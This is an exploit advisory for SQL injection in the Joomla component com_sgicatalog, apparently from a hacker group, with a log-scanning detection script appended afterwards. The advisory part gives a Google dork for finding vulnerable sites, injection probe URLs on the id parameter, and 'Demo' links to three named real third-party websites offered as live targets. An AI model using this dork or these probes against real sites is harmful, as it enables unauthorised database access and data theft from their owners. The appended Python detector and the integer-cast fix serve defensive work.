####
# Exploit Title: Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability
# Google Dork: inurl:index.php?option=com_sgicatalog
# Date: 2011-10-12
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: http://joomlaapps.com/
# Version: 1.x
# Tested on: [Windows XP- Persian]
# CVE : Webapps
####

[*] ExpLo!T :

http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]
http://127.0.0.1/path/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]

[*] Demo : http://umbertodei.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
[*] Demo : http://www.holmac.com/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
[*] Demo : http://www.anisap.veneto.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'

####

[+] Peace From #BHG

Vuln Component : com_sgicatalog
Error in file joomla Component (com_sgicatalog) SQL Injection
A vulnerable parameter $ en&id=

####

=================================**BHG Security Center**=====================================
# Greets To :
| Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili
| cmaxx ~ G3n3Rall ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y
| s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ
============================================================================================
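
Added example (not part of the original advisory): a log check that flags com_sgicatalog requests whose id parameter is not a plain integer, which is how the probe shown above (id=-416') appears in a web server access log. The combined log format, the sample lines, the client addresses and the function name are constructed for illustration, and the assumption that legitimate catalog ids are unsigned integers is mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); clients are documentation IPs.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Oct/2011:10:01:02 +0000] "GET /index.php?option=com_sgicatalog&task=view&lang=en&id=416 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Oct/2011:10:01:09 +0000] "GET /index.php?option=com_sgicatalog&task=view&lang=en&id=-416%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Oct/2011:10:01:15 +0000] "GET /path/index.php?option=com_sgicatalog&task=view&lang=en&id=416&id=416abc HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Oct/2011:10:02:00 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client, timestamp, request target and status from one combined-format line
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})'
)
# Assumption: a legitimate catalog id is a short unsigned integer.
PLAIN_ID = re.compile(r"[0-9]{1,10}")


def suspicious_sgicatalog_requests(log_text):
    """Return (client, timestamp, status, decoded_id) for every com_sgicatalog
    request carrying an id value that is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, ts, target, status = m.groups()
        # parse_qs URL-decodes values and keeps repeated parameters as a list,
        # so a second id= appended to a valid one is still inspected.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_sgicatalog" not in params.get("option", []):
            continue  # other components are out of scope for this check
        for value in params.get("id", []):
            if not PLAIN_ID.fullmatch(value):
                findings.append((client, ts, int(status), value))
    return findings


if __name__ == "__main__":
    for client, ts, status, value in suspicious_sgicatalog_requests(SAMPLE_LOG):
        print(f"{ts} {client} status={status} id={value!r}")
```

The same allow-list applied server-side, by casting id to an integer before it reaches the query, removes the injection point.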